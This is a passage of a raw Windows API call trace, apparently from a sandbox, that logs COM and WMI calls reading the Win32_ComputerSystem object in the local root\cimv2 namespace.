	[0262.308] IClientSecurity:SetBlanket (This=0x6092050, pProxy=0x609204c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0262.310] IUnknown:Release (This=0x6092050) returned 0x2
	[0262.310] WbemLocator:IUnknown:Release (This=0x586f1c) returned 0x1
	[0262.310] CoTaskMemFree (pv=0x586478) 
	[0262.310] WbemLocator:IUnknown:Release (This=0x6091fac) returned 0x2
	[0262.310] IUnknown:QueryInterface (in: This=0x609204c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadd68 | out: ppvObject=0x5fadd68*=0x586f1c) returned 0x0
	[0262.311] WbemLocator:IUnknown:QueryInterface (in: This=0x586f1c, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5fadd24 | out: ppvObject=0x5fadd24*=0x0) returned 0x80004002
	[0262.311] WbemLocator:IUnknown:QueryInterface (in: This=0x586f1c, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5fadc18 | out: ppvObject=0x5fadc18*=0x0) returned 0x80004002
	[0262.312] WbemLocator:IUnknown:AddRef (This=0x586f1c) returned 0x3
	[0262.312] CoGetContextToken (in: pToken=0x5fadbb0 | out: pToken=0x5fadbb0) returned 0x0
	[0262.312] WbemLocator:IUnknown:QueryInterface (in: This=0x586f1c, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadb98 | out: ppvObject=0x5fadb98*=0x586e7c) returned 0x0
	[0262.312] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x586e7c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5fadba0 | out: pCid=0x5fadba0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0262.312] WbemLocator:IUnknown:Release (This=0x586e7c) returned 0x3
	[0262.312] CoGetContextToken (in: pToken=0x5fadba8 | out: pToken=0x5fadba8) returned 0x0
	[0262.313] WbemLocator:IUnknown:AddRef (This=0x586f1c) returned 0x4
	[0262.313] WbemLocator:IUnknown:QueryInterface (in: This=0x586f1c, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadc1c | out: ppvObject=0x5fadc1c*=0x586f04) returned 0x0
	[0262.313] WbemLocator:IUnknown:Release (This=0x586f1c) returned 0x4
	[0262.313] WbemLocator:IRpcOptions:Query (in: This=0x586f04, pPrx=0x586f1c, dwProperty=2, pdwValue=0x5fadc40 | out: pdwValue=0x5fadc40) returned 0x80004002
	[0262.313] WbemLocator:IUnknown:Release (This=0x586f04) returned 0x3
	[0262.313] WbemLocator:IUnknown:Release (This=0x586f1c) returned 0x2
	[0262.313] CoGetContextToken (in: pToken=0x5fae01c | out: pToken=0x5fae01c) returned 0x0
	[0262.313] CoGetContextToken (in: pToken=0x5fadfdc | out: pToken=0x5fadfdc) returned 0x0
	[0262.313] WbemLocator:IUnknown:AddRef (This=0x586f1c) returned 0x3
	[0262.313] WbemLocator:IUnknown:QueryInterface (in: This=0x586f1c, riid=0x5fae058*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5fae054 | out: ppvObject=0x5fae054*=0x609204c) returned 0x0
	[0262.314] WbemLocator:IUnknown:Release (This=0x586f1c) returned 0x3
	[0262.314] IUnknown:Release (This=0x609204c) returned 0x2
	[0262.314] IUnknown:Release (This=0x609204c) returned 0x1
	[0262.314] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x608de40, puCount=0x5fae9a8 | out: puCount=0x5fae9a8*=0x2) returned 0x0
	[0262.314] WbemDefPath:IWbemPath:GetText (in: This=0x608de40, lFlags=4, puBuffLength=0x5fae9a4*=0x0, pszText=0x0 | out: puBuffLength=0x5fae9a4*=0x17, pszText=0x0) returned 0x0
	[0262.314] WbemDefPath:IWbemPath:GetText (in: This=0x608de40, lFlags=4, puBuffLength=0x5fae9a4*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5fae9a4*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0262.314] CoGetContextToken (in: pToken=0x5fae344 | out: pToken=0x5fae344) returned 0x0
	[0262.314] CoGetContextToken (in: pToken=0x5fae304 | out: pToken=0x5fae304) returned 0x0
	[0262.314] WbemLocator:IUnknown:AddRef (This=0x586f1c) returned 0x2
	[0262.314] WbemLocator:IUnknown:QueryInterface (in: This=0x586f1c, riid=0x5fae380*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5fae37c | out: ppvObject=0x5fae37c*=0x609204c) returned 0x0
	[0262.315] WbemLocator:IUnknown:Release (This=0x586f1c) returned 0x2
	[0262.315] IUnknown:AddRef (This=0x609204c) returned 0x3
	[0262.315] IEnumWbemClassObject:Clone (in: This=0x609204c, ppEnum=0x5fae978 | out: ppEnum=0x5fae978*=0x6092114) returned 0x0
	[0262.317] IUnknown:QueryInterface (in: This=0x6092114, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae634 | out: ppvObject=0x5fae634*=0x6092118) returned 0x0
	[0262.317] IClientSecurity:QueryBlanket (in: This=0x6092118, pProxy=0x6092114, pAuthnSvc=0x5fae67c, pAuthzSvc=0x5fae678, pServerPrincName=0x5fae688, pAuthnLevel=0x5fae680, pImpLevel=0x5fae66c, pAuthInfo=0x5fae670, pCapabilites=0x5fae674 | out: pAuthnSvc=0x5fae67c*=0xa, pAuthzSvc=0x5fae678*=0x0, pServerPrincName=0x5fae688, pAuthnLevel=0x5fae680*=0x6, pImpLevel=0x5fae66c*=0x2, pAuthInfo=0x5fae670, pCapabilites=0x5fae674*=0x1) returned 0x0
	[0262.317] IUnknown:Release (This=0x6092118) returned 0x1
	[0262.317] IUnknown:QueryInterface (in: This=0x6092114, riid=0x6a311250*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae628 | out: ppvObject=0x5fae628*=0x5871ec) returned 0x0
	[0262.317] IUnknown:QueryInterface (in: This=0x6092114, riid=0x6a311260*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae624 | out: ppvObject=0x5fae624*=0x6092118) returned 0x0
	[0262.317] IClientSecurity:SetBlanket (This=0x6092118, pProxy=0x6092114, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x4, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0
	[0262.319] IUnknown:Release (This=0x6092118) returned 0x2
	[0262.319] WbemLocator:IUnknown:Release (This=0x5871ec) returned 0x1
	[0262.319] CoTaskMemFree (pv=0x5863e8) 
	[0262.319] IUnknown:Release (This=0x609204c) returned 0x2
	[0262.319] IUnknown:QueryInterface (in: This=0x6092114, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadfd0 | out: ppvObject=0x5fadfd0*=0x5871ec) returned 0x0
	[0262.319] WbemLocator:IUnknown:QueryInterface (in: This=0x5871ec, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5fadf8c | out: ppvObject=0x5fadf8c*=0x0) returned 0x80004002
	[0262.320] WbemLocator:IUnknown:QueryInterface (in: This=0x5871ec, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5fade80 | out: ppvObject=0x5fade80*=0x0) returned 0x80004002
	[0262.321] WbemLocator:IUnknown:AddRef (This=0x5871ec) returned 0x3
	[0262.321] CoGetContextToken (in: pToken=0x5fade18 | out: pToken=0x5fade18) returned 0x0
	[0262.321] WbemLocator:IUnknown:QueryInterface (in: This=0x5871ec, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fade00 | out: ppvObject=0x5fade00*=0x58714c) returned 0x0
	[0262.321] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x58714c, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5fade08 | out: pCid=0x5fade08*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0262.321] WbemLocator:IUnknown:Release (This=0x58714c) returned 0x3
	[0262.321] CoGetContextToken (in: pToken=0x5fade10 | out: pToken=0x5fade10) returned 0x0
	[0262.321] WbemLocator:IUnknown:AddRef (This=0x5871ec) returned 0x4
	[0262.321] WbemLocator:IUnknown:QueryInterface (in: This=0x5871ec, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fade84 | out: ppvObject=0x5fade84*=0x5871d4) returned 0x0
	[0262.321] WbemLocator:IUnknown:Release (This=0x5871ec) returned 0x4
	[0262.322] WbemLocator:IRpcOptions:Query (in: This=0x5871d4, pPrx=0x5871ec, dwProperty=2, pdwValue=0x5fadea8 | out: pdwValue=0x5fadea8) returned 0x80004002
	[0262.322] WbemLocator:IUnknown:Release (This=0x5871d4) returned 0x3
	[0262.322] WbemLocator:IUnknown:Release (This=0x5871ec) returned 0x2
	[0262.322] CoGetContextToken (in: pToken=0x5fae284 | out: pToken=0x5fae284) returned 0x0
	[0262.322] CoGetContextToken (in: pToken=0x5fae244 | out: pToken=0x5fae244) returned 0x0
	[0262.322] WbemLocator:IUnknown:AddRef (This=0x5871ec) returned 0x3
	[0262.322] WbemLocator:IUnknown:QueryInterface (in: This=0x5871ec, riid=0x5fae2c0*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5fae2bc | out: ppvObject=0x5fae2bc*=0x6092114) returned 0x0
	[0262.322] WbemLocator:IUnknown:Release (This=0x5871ec) returned 0x3
	[0262.322] IUnknown:Release (This=0x6092114) returned 0x2
	[0262.323] IUnknown:Release (This=0x6092114) returned 0x1
	[0262.323] CoGetContextToken (in: pToken=0x5fae878 | out: pToken=0x5fae878) returned 0x0
	[0262.323] CoGetContextToken (in: pToken=0x5fae838 | out: pToken=0x5fae838) returned 0x0
	[0262.323] WbemLocator:IUnknown:AddRef (This=0x5871ec) returned 0x2
	[0262.323] WbemLocator:IUnknown:QueryInterface (in: This=0x5871ec, riid=0x5fae8b4*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x5fae8b0 | out: ppvObject=0x5fae8b0*=0x6092114) returned 0x0
	[0262.323] WbemLocator:IUnknown:Release (This=0x5871ec) returned 0x2
	[0262.323] IUnknown:AddRef (This=0x6092114) returned 0x3
	[0262.323] IEnumWbemClassObject:Reset (This=0x6092114) returned 0x0
	[0262.324] IUnknown:Release (This=0x6092114) returned 0x2
	[0262.324] CoGetContextToken (in: pToken=0x5fae76c | out: pToken=0x5fae76c) returned 0x0
	[0262.324] IUnknown:AddRef (This=0x6092114) returned 0x3
	[0262.324] IEnumWbemClassObject:Next (in: This=0x6092114, lTimeout=-1, uCount=0x1, apObjects=0x4f1530, puReturned=0x2ffacec | out: apObjects=0x4f1530*=0x6092150, puReturned=0x2ffacec*=0x1) returned 0x0
	[0262.329] IUnknown:QueryInterface (in: This=0x6092150, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadd78 | out: ppvObject=0x5fadd78*=0x6092150) returned 0x0
	[0262.330] IUnknown:QueryInterface (in: This=0x6092150, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5fadd34 | out: ppvObject=0x5fadd34*=0x0) returned 0x80004002
	[0262.330] IUnknown:QueryInterface (in: This=0x6092150, riid=0x746a0b9c*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5fadc28 | out: ppvObject=0x5fadc28*=0x0) returned 0x80004002
	[0262.330] IUnknown:AddRef (This=0x6092150) returned 0x3
	[0262.331] CoGetContextToken (in: pToken=0x5fadbc0 | out: pToken=0x5fadbc0) returned 0x0
	[0262.331] IUnknown:QueryInterface (in: This=0x6092150, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadba8 | out: ppvObject=0x5fadba8*=0x6092154) returned 0x0
	[0262.331] IMarshal:GetUnmarshalClass (in: This=0x6092154, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5fadbb0 | out: pCid=0x5fadbb0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0
	[0262.331] IUnknown:Release (This=0x6092154) returned 0x3
	[0262.331] CoGetContextToken (in: pToken=0x5fadbb8 | out: pToken=0x5fadbb8) returned 0x0
	[0262.331] IUnknown:AddRef (This=0x6092150) returned 0x4
	[0262.331] IUnknown:QueryInterface (in: This=0x6092150, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadc2c | out: ppvObject=0x5fadc2c*=0x0) returned 0x80004002
	[0262.331] IUnknown:Release (This=0x6092150) returned 0x3
	[0262.332] IUnknown:Release (This=0x6092150) returned 0x2
	[0262.332] CoGetContextToken (in: pToken=0x5fae018 | out: pToken=0x5fae018) returned 0x0
	[0262.332] CoGetContextToken (in: pToken=0x5fadfd8 | out: pToken=0x5fadfd8) returned 0x0
	[0262.332] IUnknown:AddRef (This=0x6092150) returned 0x3
	[0262.332] IUnknown:QueryInterface (in: This=0x6092150, riid=0x5fae054*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x5fae050 | out: ppvObject=0x5fae050*=0x6092150) returned 0x0
	[0262.332] IUnknown:Release (This=0x6092150) returned 0x3
	[0262.332] IUnknown:Release (This=0x6092150) returned 0x2
	[0262.332] IUnknown:Release (This=0x6092150) returned 0x1
	[0262.332] IUnknown:Release (This=0x6092114) returned 0x2
	[0262.333] CoGetContextToken (in: pToken=0x5fae8fc | out: pToken=0x5fae8fc) returned 0x0
	[0262.333] IUnknown:AddRef (This=0x6092150) returned 0x2
	[0262.333] IWbemClassObject:Get (in: This=0x6092150, wszName="__GENUS", lFlags=0, pVal=0x5fae978*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x5faea2c*=0, plFlavor=0x5faea28*=0 | out: pVal=0x5fae978*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x5faea2c*=3, plFlavor=0x5faea28*=64) returned 0x0
	[0262.333] IWbemClassObject:Get (in: This=0x6092150, wszName="__PATH", lFlags=0, pVal=0x5fae958*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x5faea10*=0, plFlavor=0x5faea0c*=0 | out: pVal=0x5fae958*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"", varVal2=0x0), pType=0x5faea10*=8, plFlavor=0x5faea0c*=64) returned 0x0
	[0262.333] SysStringLen (param_1="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x3c
	[0262.333] CoGetObjectContext (in: riid=0x2b5ad00*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5fae9b0 | out: ppv=0x5fae9b0*=0x4a8dec) returned 0x0
	[0262.334] IComThreadingInfo:GetCurrentApartmentType (in: This=0x4a8dec, pAptType=0x5fae9a8 | out: pAptType=0x5fae9a8*=1) returned 0x0
	[0262.334] IUnknown:QueryInterface (in: This=0x4a8dec, riid=0x2b5ace8*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x5fae9ac | out: ppvObject=0x5fae9ac*=0x0) returned 0x80004002
	[0262.334] IUnknown:Release (This=0x4a8dec) returned 0x1
	[0262.334] CoGetClassObject (in: rclsid=0x563d04*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x746da3b0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x5fae4c8 | out: ppv=0x5fae4c8*=0x608dee8) returned 0x0
	[0262.334] WbemDefPath:IUnknown:QueryInterface (in: This=0x608dee8, riid=0x747c7ecc*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x5fae2f8 | out: ppvObject=0x5fae2f8*=0x0) returned 0x80004002
	[0262.334] WbemDefPath:IClassFactory:CreateInstance (in: This=0x608dee8, pUnkOuter=0x0, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae330 | out: ppvObject=0x5fae330*=0x6091ee8) returned 0x0
	[0262.335] WbemDefPath:IUnknown:QueryInterface (in: This=0x6091ee8, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fae0d4 | out: ppvObject=0x5fae0d4*=0x6091ee8) returned 0x0
	[0262.335] WbemDefPath:IUnknown:QueryInterface (in: This=0x6091ee8, riid=0x74774204*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x5fae090 | out: ppvObject=0x5fae090*=0x0) returned 0x80004002
	[0262.335] WbemDefPath:IUnknown:AddRef (This=0x6091ee8) returned 0x3
	[0262.335] CoGetContextToken (in: pToken=0x5fadf1c | out: pToken=0x5fadf1c) returned 0x0
	[0262.335] WbemDefPath:IUnknown:QueryInterface (in: This=0x6091ee8, riid=0x746523cc*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadf04 | out: ppvObject=0x5fadf04*=0x61c7b20) returned 0x0
	[0262.335] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x61c7b20, riid=0x74757714*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x5fadf0c | out: pCid=0x5fadf0c*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0
	[0262.336] WbemDefPath:IUnknown:Release (This=0x61c7b20) returned 0x3
	[0262.336] CoGetContextToken (in: pToken=0x5fadf14 | out: pToken=0x5fadf14) returned 0x0
	[0262.336] WbemDefPath:IUnknown:AddRef (This=0x6091ee8) returned 0x4
	[0262.336] WbemDefPath:IUnknown:QueryInterface (in: This=0x6091ee8, riid=0x746a767c*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x5fadf88 | out: ppvObject=0x5fadf88*=0x0) returned 0x80004002
	[0262.336] WbemDefPath:IUnknown:Release (This=0x6091ee8) returned 0x3
	[0262.336] WbemDefPath:IUnknown:Release (This=0x6091ee8) returned 0x2
	[0262.336] WbemDefPath:IUnknown:Release (This=0x608dee8) returned 0x0
	[0262.336] WbemDefPath:IUnknown:Release (This=0x6091ee8) returned 0x1
	[0262.337] CoGetContextToken (in: pToken=0x5fae7c4 | out: pToken=0x5fae7c4) returned 0x0
	[0262.337] CoGetContextToken (in: pToken=0x5fae784 | out: pToken=0x5fae784) returned 0x0
	[0262.337] WbemDefPath:IUnknown:AddRef (This=0x6091ee8) returned 0x2
	[0262.337] WbemDefPath:IUnknown:QueryInterface (in: This=0x6091ee8, riid=0x5fae800*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5fae7fc | out: ppvObject=0x5fae7fc*=0x6091ee8) returned 0x0
	[0262.337] WbemDefPath:IUnknown:Release (This=0x6091ee8) returned 0x2
	[0262.337] WbemDefPath:IUnknown:Release (This=0x6091ee8) returned 0x1
	[0262.337] CoGetContextToken (in: pToken=0x5fae844 | out: pToken=0x5fae844) returned 0x0
	[0262.337] CoGetContextToken (in: pToken=0x5fae804 | out: pToken=0x5fae804) returned 0x0
	[0262.337] WbemDefPath:IUnknown:AddRef (This=0x6091ee8) returned 0x2
	[0262.337] WbemDefPath:IUnknown:QueryInterface (in: This=0x6091ee8, riid=0x5fae880*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x5fae87c | out: ppvObject=0x5fae87c*=0x6091ee8) returned 0x0
	[0262.338] WbemDefPath:IUnknown:Release (This=0x6091ee8) returned 0x2
	[0262.338] WbemDefPath:IUnknown:AddRef (This=0x6091ee8) returned 0x3
	[0262.338] WbemDefPath:IWbemPath:SetText (This=0x6091ee8, uMode=0x4, pszPath="\\\\XDUWTFONO\\ROOT\\cimv2:Win32_ComputerSystem.Name=\"XDUWTFONO\"") returned 0x0
	[0262.338] WbemDefPath:IUnknown:Release (This=0x6091ee8) returned 0x2
	[0262.338] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x608de40, puCount=0x5fae9e4 | out: puCount=0x5fae9e4*=0x2) returned 0x0
	[0262.338] WbemDefPath:IWbemPath:GetText (in: This=0x608de40, lFlags=4, puBuffLength=0x5fae9e0*=0x0, pszText=0x0 | out: puBuffLength=0x5fae9e0*=0x17, pszText=0x0) returned 0x0
	[0262.338] WbemDefPath:IWbemPath:GetText (in: This=0x608de40, lFlags=4, puBuffLength=0x5fae9e0*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5fae9e0*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0262.338] CoGetContextToken (in: pToken=0x5fae76c | out: pToken=0x5fae76c) returned 0x0
	[0262.338] IUnknown:AddRef (This=0x6092114) returned 0x3
	[0262.338] IEnumWbemClassObject:Next (in: This=0x6092114, lTimeout=-1, uCount=0x1, apObjects=0x4f1530, puReturned=0x2ffacec | out: apObjects=0x4f1530*=0x0, puReturned=0x2ffacec*=0x0) returned 0x1
	[0262.344] IUnknown:Release (This=0x6092114) returned 0x2
	[0262.345] CoGetContextToken (in: pToken=0x5fae8b4 | out: pToken=0x5fae8b4) returned 0x0
	[0262.345] WbemLocator:IUnknown:Release (This=0x5871ec) returned 0x1
	[0262.345] IUnknown:Release (This=0x6092114) returned 0x0
	[0262.347] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x608de40, puCount=0x5faea58 | out: puCount=0x5faea58*=0x2) returned 0x0
	[0262.347] WbemDefPath:IWbemPath:GetText (in: This=0x608de40, lFlags=4, puBuffLength=0x5faea54*=0x0, pszText=0x0 | out: puBuffLength=0x5faea54*=0x17, pszText=0x0) returned 0x0
	[0262.348] WbemDefPath:IWbemPath:GetText (in: This=0x608de40, lFlags=4, puBuffLength=0x5faea54*=0x17, pszText="0000000000000000000000" | out: puBuffLength=0x5faea54*=0x17, pszText="\\\\localhost\\root\\cimv2") returned 0x0
	[0262.348] IWbemClassObject:Get (in: This=0x6092150, wszName="__NAMESPACE", lFlags=0, pVal=0x5faea14*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2ffbb04*=0, plFlavor=0x2ffbb08*=0 | out: pVal=0x5faea14*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ROOT\\cimv2", varVal2=0x0), pType=0x2ffbb04*=8, plFlavor=0x2ffbb08*=64) returned 0x0
	[0262.348] SysStringLen (param_1="ROOT\\cimv2") returned 0xa
